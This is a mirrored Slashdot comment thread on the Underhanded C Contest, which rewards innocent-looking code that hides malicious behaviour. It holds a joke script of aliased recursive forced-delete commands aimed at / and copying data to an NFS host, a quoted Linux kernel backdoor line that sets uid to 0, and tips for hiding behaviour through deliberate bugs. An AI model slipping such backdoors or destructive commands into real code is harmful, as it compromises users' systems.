Slashdot Mirror
The First Annual Underhanded C Contest
Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."
RTFA, please.
The challenge for the first UCC is to write a simple program that performs some basic image-processing operation, for example smoothing or resampling, but manages to conceal a unique imperceptible fingerprint in each image it opens.
The fingerprint should be different for every execution of the program. It doesn't have to have any particular meaning, but useful tracking information is worth extra points (tho getting caught is worth fewer points.) The print should be extractable from the output image by another program. Realistically, the detector will not have access to the original image for comparison purposes.
I seriously doubt that anyone could get arrested for writing something like this, dubious legal state or not.
I hear there's rumors on the Slashdots
Any open-source steganography programs
Why, yes! http://sourceforge.net/projects/steghide/
bash: rtfm: command not found
RTFA. The idea is to hide the malicious functions so that the source code looks innocent.
# cat
Damn, my RAM is full of llamas.
I mean I could do something like this:
# When do you want it done?
$today="sudo";
$yesterday="su -c";
# Define our globals
$superman="ls";
$wonderwoman="rm"
$bat
$aquaman="mv";
#define some important flags
$blows="-r";
$maims="-p";
$chunks="-f";
#define some targets
$your_mom="/";
$your_dad="/usr";
$your
$your_teacher="/bin";
$hell="/dev/n
$heaven="/dev/random";
$skyhigh="nfs://mys
#....later, back at Superfriends Headquarters
`$batman $blows $your_sister $skyhigh`;
`$wonderwoman $blows $chunks $on $your_sister`;
`$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
#Would you like to see the rest of the story?
#print "Would you like to hear more? Please type your password to continue!";
The superfriends save the day again.
Karma: Chameleon (mostly due to the fact that you come and go).
For all you could possibly want to know about C, and more, check out this book (8M pdf). Those who want pure, uncommentaried, standard words can find them here.
Please check out the contest page: the "evil" behavior is not something java would prevent you from doing. We're not talking about crashing a computer or gaining root access, but performing a data processing task incorrectly. It's entirely problem state.
That being said, I chose C because it does permit more tricks along the lines of stack smashing and type mismatches. The winners of the obfuscated V contest used techniques like this to conceal their evil behavior, so I feel this would give people more freedom to get creative.
Finally, this is not meant to slam C, or open source, or any such like. I can't imagine how anyone can look at this contest and see it as an argument for less openness.
Xcott
1. "Invoking" the law is what you do in response to a violation.
2. You don't mod people down over Godwin's Law. You declare the argument over, and the person who tried to use nazis or Hitler to vilify their opponent is the loser. There is not "-1, Godwin" mod category, nor should there be.
3. You only mod jokes up as "Funny" or "Insightful" if they are, in fact, funny or insightful. Saying Free Beer doesn't lead to greater liberties because Hitler once gave some people free beer fails to either debunk the original point (which can still be true in other cases), and also fails to make anybody laugh.
So no mod points should be used on his post, so people can save them to mod down both your post and mine as "Offtopic."
"The day someone makes a knockoff of Slashdot that's a bit more computer-science oriented and isn't solely aimed at producing the same tired old trolling every day"
/. knockoff.)
Have you seen Technocrat.net? Looks to be just starting, but I'm already impressed: slashdot ran an article on a nanotech textiles protest - technocrat ran one on a group of scientists demonstrating a refined iteration of a carbon nanotube CPU. Comments are on-topic too, touch wood.
(Or there's always ars for CS stuff, but they're hardly a
Is Google down? Okay, I updated the faq to tell you who we are.
Also, we never said anything about hackers. Nowhere have we associated hacking with malicious behavior. And I sincerly hope this will be a learning experience for all involved. I, in particular, will probably learn a thing or two about running next year's contest.
Xcott
Remember the recent Linux contamination
...
Something like:
if (blah || blah || uid=0) {
blah;
}
Just because it CAN be done, doesn't mean it should!
This reminds me about the attempt at inserting a backdoor in the linux kernel to gain root access. If they found out who did this, maybe he should get the free beer? ;)
The attempt was trying to insert
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).
You're just used to it. Problems: difficult to compile, difficult to convert to better languages (thank you preprocessor), encourages obfuscation, some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings. That's just off the top of my head.
http://support.microsoft.com/?kbid=311486
Win a signed Stephen Carpenter ESP Guitar from the Deftones: http://def-tag.com/?r=0008781
It was for DOS4GW but I think you're being pedantic.
Doesn't it make you feel good to know that our freedoms are protected by politicans, lawyers and journalists.
Actually I'm from upstate NY and have had a chance to try Ommegang beers; of the three that I've tried, all are excellent.
I've tried their Rare Vos, Hennepin, and self-named Ommegang beer: my favorite is the Rare Vos but I like them all.
- "Nobody came out that night, not one was ever seen. But Old Man Stauf is waiting there, crazy sick and mean!"
That's not very sneaky - it looks downright malicious. At the very least, who would run a program that launches a new fsck every five seconds? Even if the fs was read-only, you'll bring your system to a crawl in no time.
// Etc - continue for 9 points from prev_x to next_x, prev_y to next_y
:) I can't wait to see the results.
What you really want is something more subtle. For example, here's an easy one using rounding errors in the core of a smoothing algorithm. Assumes a picture of width x height of type "RGB" (assumed to be a typedef'ed struct containing bytes r, g, and b) in a two-dimensional array called "picture" (and an equivalent one called "dest_picture").
for (int x=0; xwidth; x++)
{
const int next_x=(x+1==width ? 0 : x+1);
const int prev_x=(x-1==-1 ? width-1 : x-1);
for (int y=0; yheight; y++)
{
const int next_y=(y+1==height ? 0 : y+1);
const int prev_y=(y-1==-1 ? height-1 : y-1);
const RGB point1 = picture[prev_x][prev_y];
const char point1_r = point1.r / 9;
const char point1_g = point1.g / 9;
const char point1_b = point1.b / 9;
const RGB point2 = picture[x][prev_y];
const char point2_r = point2.r / 9;
const char point2_g = point2.g / 9;
const char point2_b = point2.b / 9;
const char dest_r = point1_r + point2_r + point3_r + point4_r + point5_r + point6_r + point7_r + point8_r + point9_r;
const char dest_g = point1_g + point2_g + point3_g + point4_g + point5_g + point6_g + point7_g + point8_g + point9_g;
const char dest_b = point1_b + point2_b + point3_b + point4_b + point5_b + point6_b + point7_b + point8_b + point9_b;
next_picture[x][y].r=dest_r;
next_picture[x][y].g=dest_g;
next_picture[x][y].b=dest_b;
}
}
In case you didn't catch what it does, by dividing by nine before accumulating instead of afterwards, we're losing more color resolution. You'll never see values 253, 254, or 255, for example, in r, g, or b. There will also be a sawtooth pattern in what were initially smooth gradients on a per-channel basis (less noticable when the image is viewed as a whole). It's not perfect, but it is a start. The possibilities really increase when doing things that add noise to an image; skewing a randomization function is trivially easy.
If you want to be really devious, though, you need to mess with program internals. Overflow a string to mess with your function's frame return parameter, for example. You could also do things like deliberately cause signals to be thrown that you catch. There's a lot of possibilities.
"This wallpaper is killing me. One of us has got to go." -- Oscar Wilde on his deathbed
Any program that was able to do two things would pass: The ability to load remote information into memory and to begin execution of the loaded information.
A way to automatically find this would be to use an execution tracer that would alert you when the programs point of execution "left" it's source code or allowed system api's.
Shh.
You are correct. This is from ISO/IEC 9899:1999(E):
(emphasis added)Are you really going to want to wait 100s of milliseconds for a garbage collector to run at arbitrary intervals in your carefully word aligned DMA transaction code that needs to run within a matter of microseconds?
Are you aware that the Linux kernel contains not just one, but two fully-functional tracing garbage collectors? There's one in JFS2 and another in the routing table/xform code.
Funny how people always get hung up about GC, when really it's all around them and they never even knew, because it the flaws they thought it had don't exist .